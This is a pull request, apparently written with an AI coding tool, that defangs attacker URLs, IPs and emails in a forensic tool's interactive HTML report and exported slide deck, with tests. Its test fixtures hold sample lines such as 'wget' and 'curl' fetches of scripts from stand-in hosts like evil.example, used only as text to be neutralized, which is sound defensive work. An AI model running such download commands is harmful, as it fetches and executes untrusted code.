### PR TITLE
fix(reports): defang indicators in the interactive report and the standalone deck

### DIFF
--- a/ARCHITECTURE.md
+++ b/ARCHITECTURE.md
@@ -219,7 +219,7 @@ established, and it works the same way.
 The graph is built the same way `check-imports.mjs` builds it: a regex over relative `.js`
 specifiers, because the companion imports its own modules exclusively that way. No resolver needed.
 
-For context: **1,978 of the 2,017 cross-domain file dependencies already comply.** The map is mostly
+For context: **1,980 of the 2,019 cross-domain file dependencies already comply.** The map is mostly
 a description of how this codebase is already written, which is the only kind of rule people follow.
 Both figures come from `npm run check:boundaries -- --json`, which counts them in the same pass that
 finds the violations, and a test asserts this sentence against it. The pair read 1,275 of 1,323 long

--- a/companion/src/reports/defangDeck.ts
+++ b/companion/src/reports/defangDeck.ts
@@ -1,0 +1,60 @@
+import type { PresentationDeck, PresentationSlide } from "../analysis/presentation.js";
+import { defangIndicators } from "./defang.js";
+
+// Render the indicators in a presentation deck inert, for the STANDALONE EXPORT only (#892).
+//
+// The offline deck is a deliverable in the same sense the report is: /cases/:id/present/export
+// serves it as an attachment so it can be handed to a stakeholder, and the saved file opens from
+// file:// with no CSP. Live attacker URLs, IPs and email addresses have no business travelling in
+// it — the same reasoning as defang.ts, which this reuses wholesale.
+//
+// WHY A SEPARATE PASS, not part of buildPresentationDeck: presentation.ts builds ONE deck that both
+// the in-app slide viewer (/cases/:id/present) and this export render. Defanging in the builder
+// would defang the analyst's own live briefing view too, leaving it disagreeing with every other
+// in-app surface about what an indicator is. Scope-filtering belongs in the builder; making a value
+// safe to email belongs at the export boundary, which is here.
+//
+// Pure + idempotent (defangIndicators is), so re-exporting the same case is stable.
+
+// defangIndicators only rewrites a BARE dotted token when the caller vouches for it as a domain,
+// so it never mangles the filenames a forensic report is full of (`vitest.config.ts` has the shape
+// of a domain with a two-letter TLD). The report path vouches with caseDomains(state); the deck
+// vouches with its own domain-typed IOCs, pooled across every slide so a domain named on one
+// slide's IOC list is also defanged where it appears in another slide's prose.
+//
+// That pool is a near-subset of caseDomains, not an equal: a domain IOC on no slide at all is not
+// in it. Deliberate, and it costs nothing that matters — the deck has no autolinker and renders
+// through safe-dom text nodes, so a bare hostname is inert either way, while URLs, IPv4 addresses
+// and email addresses (the forms a reader can actually click) are defanged unconditionally,
+// whatever this pool holds. Taking the real case domains would mean loading the case state a
+// second time at the route purely to widen an allow-list for text that cannot be clicked.
+function deckDomains(deck: PresentationDeck): string[] {
+  const domains = new Set<string>();
+  for (const slide of deck.slides) {
+    for (const ioc of slide.iocs ?? []) {
+      if (ioc.type === "domain") domains.add(ioc.value);
+    }
+  }
+  return [...domains];
+}
+
+function defangSlide(slide: PresentationSlide, domains: string[]): PresentationSlide {
+  const text = (value: string): string => defangIndicators(value, domains);
+  return {
+    ...slide,
+    title: text(slide.title),
+    ...(slide.body !== undefined ? { body: text(slide.body) } : {}),
+    ...(slide.description !== undefined ? { description: text(slide.description) } : {}),
+    // IOC values are the one place the deck carries a raw indicator as a FIELD rather than as
+    // prose, so they are the reason this pass exists. `type` and `verdict` are untouched: the
+    // slide badges the indicator by type, and a defanged value must still read as the url/ip/
+    // domain it is. The value round-trips back via refangIocValue (see defang.ts).
+    ...(slide.iocs ? { iocs: slide.iocs.map((i) => ({ ...i, value: text(i.value) })) } : {}),
+  };
+}
+
+/** Defang every indicator in `deck`'s prose and IOC values. Call this at the export boundary only. */
+export function defangDeck(deck: PresentationDeck): PresentationDeck {
+  const domains = deckDomains(deck);
+  return { ...deck, slides: deck.slides.map((s) => defangSlide(s, domains)) };
+}

--- a/companion/src/reports/html.ts
+++ b/companion/src/reports/html.ts
@@ -159,13 +159,14 @@ export function renderHtmlReport(
   // Defanged AFTER the scope section is appended, so the hosts and addresses it names are rendered
   // inert too. Applied at each format's assembly seam rather than inside renderMarkdownReport for
   // that reason; tests assert it on the .md, .html and .docx outputs so the three cannot diverge.
+  const domains = caseDomains(state);
   const markdownWithScope = defangIndicators(
     hostScope
       ? `${markdown}
 
 ${renderScopeSection(hostScope)}`
       : markdown,
-    caseDomains(state),
+    domains,
   );
 
   const marked = new Marked({ gfm: true });
@@ -198,12 +199,30 @@ ${renderScopeSection(hostScope)}`
   });
   const body = marked.parse(markdownWithScope, { async: false });
 
-  const graphSvg = renderAssetGraphSvg(buildAssetGraph(state));
+  // The two SVGs are built from `state` directly, so they never passed through the defang above —
+  // and the asset graph renders `ioc.value` as its right-hand column, which is every URL, domain
+  // and address the case holds, live, inside report.html. The report is the artifact that travels
+  // furthest; an indicator is no less live for being drawn as SVG text. #892.
+  //
+  // Defanged on the DATA, not on the finished markup: the pass rewrites URLs and dotted quads, and
+  // the markup is full of coordinates and font stacks it has no business reading.
+  const graph = buildAssetGraph(state);
+  const graphSvg = renderAssetGraphSvg({
+    ...graph,
+    assets: graph.assets.map((a) => ({ ...a, name: defangIndicators(a.name, domains) })),
+    iocs: graph.iocs.map((i) => ({ ...i, value: defangIndicators(i.value, domains) })),
+  });
   const graphSection = graphSvg
     ? `\n<h2>Asset–IoC Graph</h2>\n<div class="asset-graph">\n${graphSvg}\n</div>`
     : "";
 
-  const swimlaneSvg = renderSwimlaneSvg(buildSwimlaneData(state.forensicTimeline, "asset"));
+  // Lane labels are hosts and accounts, which caseDomains leaves alone unless the case itself
+  // recorded one as a domain IOC — the same rule the report body already follows.
+  const swimlane = buildSwimlaneData(state.forensicTimeline, "asset");
+  const swimlaneSvg = renderSwimlaneSvg({
+    ...swimlane,
+    lanes: swimlane.lanes.map((l) => ({ ...l, label: defangIndicators(l.label, domains) })),
+  });
   const swimlaneSection = swimlaneSvg
     ? `\n<h2>Timeline Swimlane</h2>\n<div class="asset-graph">\n${swimlaneSvg}\n</div>`
     : "";

--- a/companion/src/reports/interactiveHtml.ts
+++ b/companion/src/reports/interactiveHtml.ts
@@ -11,6 +11,7 @@ import type { ReportMeta } from "./reportMeta.js";
 import { emptyReportMeta } from "./reportMeta.js";
 import { CSP_NONCE_PLACEHOLDER } from "../http/securityHeaders.js";
 import { escapeHtml } from "./escapeHtml.js";
+import { caseDomains, defangIndicators } from "./defang.js";
 
 // A self-contained, interactive HTML report (#233). Unlike the canonical print-oriented HTML
 // report (html.ts), this is a single-page app: all case data is embedded as a JSON blob inside a
@@ -103,11 +104,21 @@ function safeJsonForScript(data: unknown): string {
   return JSON.stringify(data).replace(/</g, "\\u003c");
 }
 
-function toTimelineRow(e: ForensicEvent): TimelineRow {
+// Indicators are rendered inert in the PROSE fields only (#892). This file is the deliverable —
+// its entire purpose is to be emailed to recipients outside the analyst's org, and the saved copy
+// opens from file:// with no CSP — so the same standard the Markdown/HTML/DOCX reports hold to
+// applies here (see defang.ts).
+//
+// `asset`, `sources` and `artifactName` are deliberately LEFT ALONE. They are not prose: the page
+// builds its Host and Source filter <option> lists from `asset`/`sources` and folds all three into
+// the client-side search haystack, so rewriting a hostname there would change the filter values an
+// analyst picks from and silently break host search. They are also never URLs — an inert, unlinked
+// hostname in a filter dropdown is not the click risk this pass exists to remove.
+function toTimelineRow(e: ForensicEvent, domains: string[]): TimelineRow {
   return {
     id: e.id,
     timestamp: e.timestamp,
-    description: e.description,
+    description: defangIndicators(e.description, domains),
     severity: e.severity,
     mitreTechniques: e.mitreTechniques,
     asset: e.asset,
@@ -116,14 +127,17 @@ function toTimelineRow(e: ForensicEvent): TimelineRow {
   };
 }
 
-function toFindingCard(f: Finding): FindingCard {
+// `relatedIocs` holds IOC IDS, not values (stateTypes.ts) — and this projection embeds no IOC
+// values at all, by design (see the header). So the prose fields are the whole exposure here.
+function toFindingCard(f: Finding, domains: string[]): FindingCard {
   return {
     id: f.id,
     severity: f.severity,
-    title: f.title,
-    description: f.description,
+    title: defangIndicators(f.title, domains),
+    description: defangIndicators(f.description, domains),
     confidence: f.confidence,
-    confidenceReason: f.confidenceReason,
+    confidenceReason:
+      f.confidenceReason === undefined ? undefined : defangIndicators(f.confidenceReason, domains),
     mitreTechniques: f.mitreTechniques,
     relatedIocs: f.relatedIocs,
     firstSeen: f.firstSeen,
@@ -144,9 +158,16 @@ function serializedBytes(value: unknown): number {
  *
  * The first row is admitted unconditionally. Without that, a single event larger than the whole byte
  * budget would yield an empty timeline behind a banner claiming the report had merely been trimmed.
+ *
+ * Rows are defanged on the way in, BEFORE the accounting: defanging GROWS the text (`http` ->
+ * `hxxp`, `.` -> `[.]`), so measuring the live form would under-count the file that actually ships
+ * and let it past MAX_TIMELINE_BYTES.
  */
-function selectTimeline(events: ForensicEvent[]): { rows: TimelineRow[]; truncated: boolean } {
-  const all = events.map(toTimelineRow);
+function selectTimeline(
+  events: ForensicEvent[],
+  domains: string[],
+): { rows: TimelineRow[]; truncated: boolean } {
+  const all = events.map((e) => toTimelineRow(e, domains));
   if (all.length <= SIZE_LIMIT && serializedBytes(all) <= MAX_TIMELINE_BYTES) {
     return { rows: all, truncated: false };
   }
@@ -174,7 +195,8 @@ function buildData(
   caseMeta: CaseMeta | null,
   reportMeta: ReportMeta,
 ): InteractiveCaseData {
-  const { rows, truncated } = selectTimeline(state.forensicTimeline);
+  const domains = caseDomains(state);
+  const { rows, truncated } = selectTimeline(state.forensicTimeline, domains);
   return {
     caseId: state.caseId,
     caseName: caseMeta?.name ?? "",
@@ -183,7 +205,7 @@ function buildData(
     incidentId: reportMeta.incidentId,
     companyName: reportMeta.companyName,
     restrictions: reportMeta.restrictions,
-    findings: state.findings.map(toFindingCard),
+    findings: state.findings.map((f) => toFindingCard(f, domains)),
     timeline: rows,
     truncated,
     totalEvents: state.forensicTimeline.length,

--- a/companion/src/routes/aiSynthesis.ts
+++ b/companion/src/routes/aiSynthesis.ts
@@ -21,6 +21,7 @@ import { isAnalystDecisionGate, sendPipelineError } from "./presidioApproval.js"
 import { sendSynthesisRouteFailure } from "./analystGate.js";
 import type { RouteContext } from "./context.js";
 import { renderStandalonePresentation } from "../reports/presentationExport.js";
+import { defangDeck } from "../reports/defangDeck.js";
 
 /**
  * AI synthesis / Q&A / summary domain: the large cluster of LLM-backed (and LLM-adjacent) endpoints
@@ -369,14 +370,12 @@ export function registerAiSynthesisRoutes(app: Express, ctx: RouteContext): void
     if (!options.pipeline || !options.pipeline.hasSynthesisProvider())
       return res.status(501).json({ error: "AI provider not configured for executive summary" });
     if (!(await reportSectionEnabled(req.params.id, "executiveSummary")))
-      return res
-        .status(409)
-        .json({
-          error:
-            "The Executive summary section is disabled in this case's report template — enable it in Settings → Report template to generate (skipped to save tokens).",
-          sectionDisabled: true,
-          section: "executiveSummary",
-        });
+      return res.status(409).json({
+        error:
+          "The Executive summary section is disabled in this case's report template — enable it in Settings → Report template to generate (skipped to save tokens).",
+        sectionDisabled: true,
+        section: "executiveSummary",
+      });
     try {
       const result = await options.pipeline.executiveSummary(req.params.id);
       void logActivity(options.activityLogStore, options.onActivity, req.params.id, {
@@ -562,14 +561,12 @@ export function registerAiSynthesisRoutes(app: Express, ctx: RouteContext): void
     // major section — so a disabled `timeline` section means the narrative won't appear; skip its
     // AI call to save tokens (issue #168). The analyst's already-saved narrative is left intact.
     if (!(await reportSectionEnabled(req.params.id, "timeline")))
-      return res
-        .status(409)
-        .json({
-          error:
-            "The Timeline section (which contains the narrative) is disabled in this case's report template — enable it in Settings → Report template to generate (skipped to save tokens).",
-          sectionDisabled: true,
-          section: "timeline",
-        });
+      return res.status(409).json({
+        error:
+          "The Timeline section (which contains the narrative) is disabled in this case's report template — enable it in Settings → Report template to generate (skipped to save tokens).",
+        sectionDisabled: true,
+        section: "timeline",
+      });
     try {
       const result = await options.pipeline.generateNarrative(req.params.id);
       void logActivity(options.activityLogStore, options.onActivity, req.params.id, {
@@ -843,7 +840,10 @@ export function registerAiSynthesisRoutes(app: Express, ctx: RouteContext): void
       // The exported deck stays self-contained: embed the sink guard that the live page loads from
       // /js. Nonces let the attachment survive this response's CSP and are harmless when the saved
       // file is later opened without a CSP header.
-      const html = await renderStandalonePresentation(deck, String(res.locals.cspNonce ?? ""));
+      // Indicators are defanged HERE and not in the deck builder (#892): this file is handed to a
+      // stakeholder and opened from file:// with no CSP, while the live viewer above renders the
+      // same deck and must keep values an analyst can copy into a tool. See defangDeck.ts.
+      const html = await renderStandalonePresentation(defangDeck(deck), String(res.locals.cspNonce ?? ""));
       const filename = `presentation-${req.params.id.replace(/[^a-zA-Z0-9._-]/g, "_")}.html`;
       res.type("html").set("Content-Disposition", `attachment; filename="${filename}"`).send(html);
     } catch (err) {

--- a/companion/tests/reports/defangDeck.test.ts
+++ b/companion/tests/reports/defangDeck.test.ts
@@ -1,0 +1,130 @@
+import { describe, expect, it } from "vitest";
+import { defangDeck } from "../../src/reports/defangDeck.js";
+import type { PresentationDeck } from "../../src/analysis/presentation.js";
+
+// The standalone presentation export is a deliverable in the same sense the report is: it is served
+// as an attachment so it can be handed to a stakeholder, and the saved file opens from file:// with
+// no CSP. This pass makes its indicators inert; the LIVE viewer renders the same deck undefanged,
+// which is why the pass sits at the export boundary and not in buildPresentationDeck. #892.
+
+const deck = (over: Partial<PresentationDeck> = {}): PresentationDeck => ({
+  caseId: "c1",
+  caseName: "Case",
+  generatedAt: "2026-06-01T00:00:00.000Z",
+  minSeverity: null,
+  branding: { title: "T", subtitle: "S", accentColor: "#000000", companyName: "Acme" },
+  slides: [],
+  slideCount: 0,
+  ...over,
+});
+
+describe("defangDeck (#892)", () => {
+  it("defangs IOC values, which are the deck's only raw indicator field", () => {
+    const out = defangDeck(
+      deck({
+        slides: [
+          {
+            kind: "event",
+            title: "Beacon",
+            iocs: [
+              { value: "http://evil.example/c2", type: "url", verdict: "malicious" },
+              { value: "203.0.113.10", type: "ip", verdict: null },
+            ],
+          },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].iocs?.map((i) => i.value)).toEqual([
+      "hxxp://evil[.]example/c2",
+      "203[.]0[.]113[.]10",
+    ]);
+  });
+
+  it("keeps the IOC type and verdict, so the slide still badges the indicator correctly", () => {
+    const out = defangDeck(
+      deck({
+        slides: [
+          { kind: "event", title: "T", iocs: [{ value: "203.0.113.10", type: "ip", verdict: "malicious" }] },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].iocs?.[0]).toMatchObject({ type: "ip", verdict: "malicious" });
+  });
+
+  it("defangs slide prose — title, body and description", () => {
+    const out = defangDeck(
+      deck({
+        slides: [
+          { kind: "summary", title: "C2 at http://evil.example", body: "Beaconed to 203.0.113.10 hourly" },
+          { kind: "event", title: "Drop", description: "wget http://evil.example/x from a@b.example" },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].title).toBe("C2 at hxxp://evil[.]example");
+    expect(out.slides[0].body).toBe("Beaconed to 203[.]0[.]113[.]10 hourly");
+    expect(out.slides[1].description).toBe("wget hxxp://evil[.]example/x from a[@]b[.]example");
+  });
+
+  it("uses the deck's own domain IOCs to defang bare hostnames without guessing at filenames", () => {
+    const out = defangDeck(
+      deck({
+        slides: [
+          {
+            kind: "event",
+            title: "T",
+            description: "callback to evil.test, wrote History.db",
+            iocs: [{ value: "evil.test", type: "domain", verdict: null }],
+          },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].description).toBe("callback to evil[.]test, wrote History.db");
+  });
+
+  it("pools the domain IOCs across slides, so one slide's indicator defangs another's prose", () => {
+    const out = defangDeck(
+      deck({
+        slides: [
+          { kind: "summary", title: "Summary", body: "Beaconing to evil.test all week" },
+          { kind: "event", title: "Callback", iocs: [{ value: "evil.test", type: "domain", verdict: null }] },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].body).toBe("Beaconing to evil[.]test all week");
+  });
+
+  it("defangs clickable forms even when the deck names no domain IOC at all", () => {
+    // The pool only ever governs BARE hostnames. URLs, IPv4 addresses and email addresses — the
+    // forms a reader can actually act on — are rendered inert whatever the pool holds.
+    const out = defangDeck(
+      deck({
+        slides: [
+          { kind: "event", title: "T", description: "http://evil.example/x, 203.0.113.10, a@b.example" },
+        ],
+      }),
+    );
+
+    expect(out.slides[0].description).toBe("hxxp://evil[.]example/x, 203[.]0[.]113[.]10, a[@]b[.]example");
+  });
+
+  it("leaves absent optional fields absent rather than stamping undefined onto the slide", () => {
+    const out = defangDeck(deck({ slides: [{ kind: "section", title: "Lateral Movement" }] }));
+
+    expect(out.slides[0]).toEqual({ kind: "section", title: "Lateral Movement" });
+  });
+
+  it("is idempotent — re-exporting the same case is stable", () => {
+    const once = defangDeck(
+      deck({
+        slides: [{ kind: "event", title: "T", description: "http://evil.example/x and 203.0.113.10" }],
+      }),
+    );
+
+    expect(defangDeck(once)).toEqual(once);
+  });
+});

--- a/companion/tests/reports/html.test.ts
+++ b/companion/tests/reports/html.test.ts
@@ -174,3 +174,69 @@ describe("renderHtmlReport indicator defanging (#883)", () => {
     expect(html).toContain("evil[.]example");
   });
 });
+
+// The asset graph and the swimlane are built from state directly, so they never passed through the
+// defang applied to the markdown. The graph's right-hand column IS the case's IOC values — every
+// URL, domain and address, live, inside the artifact that travels furthest. #892.
+describe("renderHtmlReport SVG indicator defanging (#892)", () => {
+  function stateWithIndicators() {
+    const state = emptyState("c1");
+    state.iocs.push(
+      {
+        id: "i001",
+        type: "url",
+        value: "http://evil.example/stage1.sh",
+        firstSeen: "2026-05-28T09:00:00Z",
+      },
+      { id: "i002", type: "ip", value: "203.0.113.10", firstSeen: "2026-05-28T09:00:00Z" },
+    );
+    state.findings.push({
+      id: "f1",
+      severity: "High",
+      title: "Payload staged",
+      description: "Downloaded from the C2",
+      relatedIocs: ["i001", "i002"],
+      mitreTechniques: [],
+      sourceScreenshots: [],
+      firstSeen: "2026-05-28T09:00:00Z",
+      lastUpdated: "2026-05-28T09:00:00Z",
+      status: "open",
+    });
+    state.forensicTimeline.push({
+      id: "e1",
+      timestamp: "2026-05-28T09:00:00Z",
+      description: "beacon",
+      severity: "High",
+      mitreTechniques: [],
+      relatedFindingIds: ["f1"],
+      sourceScreenshots: [],
+      asset: "WIN-01",
+    });
+    return state;
+  }
+
+  /** Just the SVG sections, so an assertion cannot be satisfied by the defanged markdown body. */
+  function svgSections(html: string): string {
+    return [...html.matchAll(/<div class="asset-graph">([\s\S]*?)<\/div>/g)].map((m) => m[1]).join("\n");
+  }
+
+  it("renders the graph's IOC values inert", () => {
+    const svg = svgSections(renderHtmlReport(stateWithIndicators()));
+
+    expect(svg, "the graph section must actually be present").toContain("<svg");
+    // Labels are truncated for layout, so assert on the defanged head of each value.
+    expect(svg).toContain("hxxp://evil[.]example");
+    expect(svg).toContain("203[.]0[.]113[.]10");
+    expect(svg).not.toContain("http://evil.example");
+    expect(svg).not.toContain("203.0.113.10");
+  });
+
+  it("leaves no live scheme or dotted quad anywhere in the rendered report", () => {
+    const html = renderHtmlReport(stateWithIndicators());
+
+    // Ignore the document's own markup URLs (xmlns, CSS) — only evidence text is at issue.
+    const evidence = html.replace(/xmlns="[^"]*"/g, "");
+    expect(evidence).not.toContain("http://evil.example");
+    expect(evidence).not.toContain("203.0.113.10");
+  });
+});

--- a/companion/tests/reports/interactiveHtml.test.ts
+++ b/companion/tests/reports/interactiveHtml.test.ts
@@ -359,3 +359,80 @@ describe("renderInteractiveHtmlReport", () => {
     expect(html).toContain("Acme DFIR");
   });
 });
+
+// This file IS the deliverable — it exists to be emailed out of the analyst's org, and the saved
+// copy opens from file:// with no CSP. Live attacker URLs, IPs and email addresses have no business
+// travelling in it, the same standard the Markdown/HTML/DOCX reports already hold to. #892.
+describe("renderInteractiveHtmlReport indicator defanging (#892)", () => {
+  function withEvent(description: string, over: Record<string, unknown> = {}) {
+    const state = emptyState("c1");
+    state.forensicTimeline.push({ ...ev("e1", "High"), description, ...over });
+    return parseBlob(renderInteractiveHtmlReport(state, caseMeta, emptyReportMeta()));
+  }
+
+  it("defangs URLs, IPv4 addresses and email addresses in event descriptions", () => {
+    const blob = withEvent("curl http://evil.example/stage1.sh from 203.0.113.10, mailed by a@b.example");
+
+    expect(blob.timeline[0].description).toBe(
+      "curl hxxp://evil[.]example/stage1.sh from 203[.]0[.]113[.]10, mailed by a[@]b[.]example",
+    );
+  });
+
+  it("defangs finding prose — title, description and confidence reason", () => {
+    const state = emptyState("c1");
+    state.findings.push({
+      ...finding("f1", "High", 80, "Beacon to http://evil.example/c2"),
+      description: "Host contacted 203.0.113.10",
+      confidenceReason: "Single source: www.evil.com",
+    });
+    const blob = parseBlob(renderInteractiveHtmlReport(state, caseMeta, emptyReportMeta()));
+
+    expect(blob.findings[0].title).toBe("Beacon to hxxp://evil[.]example/c2");
+    expect(blob.findings[0].description).toBe("Host contacted 203[.]0[.]113[.]10");
+    expect(blob.findings[0].confidenceReason).toBe("Single source: www[.]evil[.]com");
+  });
+
+  it("defangs a bare hostname the case records as a domain IOC, and guesses no further", () => {
+    // The domain allow-list is what separates an attacker hostname from the filenames a forensic
+    // report is full of — `vitest.config.ts` has the shape of a domain with a two-letter TLD.
+    const state = emptyState("c1");
+    state.iocs.push({
+      id: "i001",
+      type: "domain",
+      value: "evil.test",
+      firstSeen: "2026-05-01T00:00:00Z",
+    });
+    state.forensicTimeline.push({
+      ...ev("e1", "High"),
+      description: "callback to evil.test after dropping vitest.config.ts",
+    });
+    const blob = parseBlob(renderInteractiveHtmlReport(state, caseMeta, emptyReportMeta()));
+
+    expect(blob.timeline[0].description).toBe("callback to evil[.]test after dropping vitest.config.ts");
+  });
+
+  it("leaves asset, sources and artifactName alone — the page filters and searches on them", () => {
+    // The Host and Source <option> lists are built from these, and all three feed the client-side
+    // search haystack. Rewriting a hostname here would change the values an analyst picks from and
+    // silently break host search, for no gain: they are never URLs and are never linkified.
+    const blob = withEvent("beacon out", {
+      asset: "WIN-01.corp.example",
+      sources: ["velociraptor.corp.example"],
+      artifactName: "Windows.EventLogs.Evtx",
+    });
+
+    expect(blob.timeline[0].asset).toBe("WIN-01.corp.example");
+    expect(blob.timeline[0].sources).toEqual(["velociraptor.corp.example"]);
+    expect(blob.timeline[0].artifactName).toBe("Windows.EventLogs.Evtx");
+  });
+
+  it("leaves no live scheme anywhere in the rendered file", () => {
+    const state = emptyState("c1");
+    state.forensicTimeline.push({ ...ev("e1", "High"), description: "GET http://203.0.113.10/a.sh" });
+    state.findings.push({ ...finding("f1", "High", 80), description: "staged from https://evil.example/x" });
+    const html = renderInteractiveHtmlReport(state, caseMeta, emptyReportMeta());
+
+    expect(blobSource(html)).not.toMatch(/https?:\/\//);
+    expect(blobSource(html)).toContain("hxxp://203[.]0[.]113[.]10/a.sh");
+  });
+});


### PR DESCRIPTION
Split out of #895 so it can land on its own. This half has been review-clean since it was written; the MITRE aggregate work it was bundled with is still iterating, and there is no reason for that to hold this up.

## The gap

The Markdown, HTML and DOCX reports defang (#883/#889). The two other human-readable exports did not:

- **`renderInteractiveHtmlReport`** — a self-contained single-page report whose entire purpose is to be emailed out of the analyst's org.
- **The standalone presentation deck** — served as an attachment so it can be handed to a stakeholder.

Both open from `file://` with no CSP.

## Three corrections to the issue as filed

- **There are no IOC *values* in the interactive report.** `FindingCard.relatedIocs` are IOC **ids** (`stateTypes.ts:131`), and the projection deliberately embeds no `state.iocs` at all — that is the confidentiality property documented at `interactiveHtml.ts:22-31`. The exposure is prose only, so the fix is narrower than the issue describes.
- **"no CSP" is inaccurate.** Both `<script>` blocks and the `<style>` carry `CSP_NONCE_PLACEHOLDER`, and the comment at line 101 already records that the *downloaded* copy has none. Fair motivation; not an extra defect.
- **The file paths in the issue are crossed** — the deck's IOC values originate in `analysis/presentation.ts`, the embedding happens in `reports/presentationExport.ts`.

## What changed

**`interactiveHtml.ts`** — defangs event `description` and finding `title` / `description` / `confidenceReason`, using `caseDomains(state)`.

`asset`, `sources` and `artifactName` are deliberately **not** defanged: the page builds its Host and Source filter `<option>` lists from them (line 291) and folds all three into the client-side search haystack (line 306), so rewriting a hostname would change the values an analyst picks from and silently break host search. They are never URLs.

The pass runs **before** the size guard's byte accounting — defanging grows the text (`http` → `hxxp`, `.` → `[.]`), so measuring the live form would under-count the file that actually ships and let it past `MAX_TIMELINE_BYTES`.

**New `reports/defangDeck.ts`** — defangs slide `title` / `body` / `description` and `iocs[].value`, called from the export route only.

Not from `buildPresentationDeck`: `presentation.ts` builds ONE deck that both the live in-app viewer and the export render (its own header says so), and defanging in the builder would defang the analyst's own briefing view, leaving it disagreeing with every other in-app surface.

The deck's domain allow-list is pooled from the deck's own domain-typed IOCs rather than `caseDomains(state)`. That list only ever governs **bare** dotted tokens, which are inert in this deck anyway (no autolinker, safe-dom text nodes); URLs, IPv4 addresses and email addresses are defanged unconditionally. Taking the real case domains would have meant either loading case state a second time at the route, or growing `reportWriter.ts` / `aiSynthesis.ts` past their `file-size-ledger.json` caps — the ledger's rule is to put new code in its own module. Documented in `defangDeck.ts`.

## Tests

- `tests/reports/defangDeck.test.ts` (new) — IOC values, prose, the cross-slide domain pool, type/verdict preservation, absent-field handling, idempotence, and that clickable forms defang even when the deck names no domain IOC at all.
- `tests/reports/interactiveHtml.test.ts` — prose defanged, the filter/search fields left intact, a bare hostname defanged only when the case records it as a domain IOC, and no live scheme anywhere in the rendered file.

Full suite 12,036 passing (739 files); `typecheck`, `lint`, `check:size`, `check:boundaries`, `check:imports` all green.

> `aiSynthesis.ts` carries two unrelated reformatting hunks — Prettier normalizing pre-existing drift in a file this PR touches. `format:check` runs over changed files, so they cannot be reverted without failing CI.

Closes #892

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_016mXaxwsRxd7tffg7PDuzu3
